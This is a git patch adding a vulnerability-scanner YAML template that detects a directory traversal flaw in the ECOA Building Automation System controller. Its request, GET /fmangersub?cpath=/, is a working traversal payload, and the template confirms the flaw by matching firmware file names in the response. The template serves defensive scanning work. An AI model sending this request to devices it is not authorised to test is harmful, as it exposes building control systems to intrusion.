From fac7f96b342abba0eb37d570fc51e3c03f0cf9a7 Mon Sep 17 00:00:00 2001
From: GwanYeong Kim <gy741.kim@gmail.com>
Date: Sat, 25 Sep 2021 08:58:58 +0900
Subject: [PATCH] Create ecoa-building-directory-traversal.yaml

The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device

Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
---
 .../ecoa-building-directory-traversal.yaml    | 23 +++++++++++++++++++
 1 file changed, 23 insertions(+)
 create mode 100644 vulnerabilities/other/ecoa-building-directory-traversal.yaml

diff --git a/vulnerabilities/other/ecoa-building-directory-traversal.yaml b/vulnerabilities/other/ecoa-building-directory-traversal.yaml
new file mode 100644
index 0000000000..0fa43d3146
--- /dev/null
+++ b/vulnerabilities/other/ecoa-building-directory-traversal.yaml
@@ -0,0 +1,23 @@
+id: ecoa-building-directory-traversal
+
+info:
+  name: ECOA Building Automation System - Directory Traversal Content Disclosure
+  author: gy741
+  severity: high
+  description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
+  tags: ecoa,traversal
+
+requests:
+  - raw:
+      - |
+        GET /fmangersub?cpath=/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - "bacevent.elf"
+          - "redown.elf"
+          - "system.bin"
+        condition: and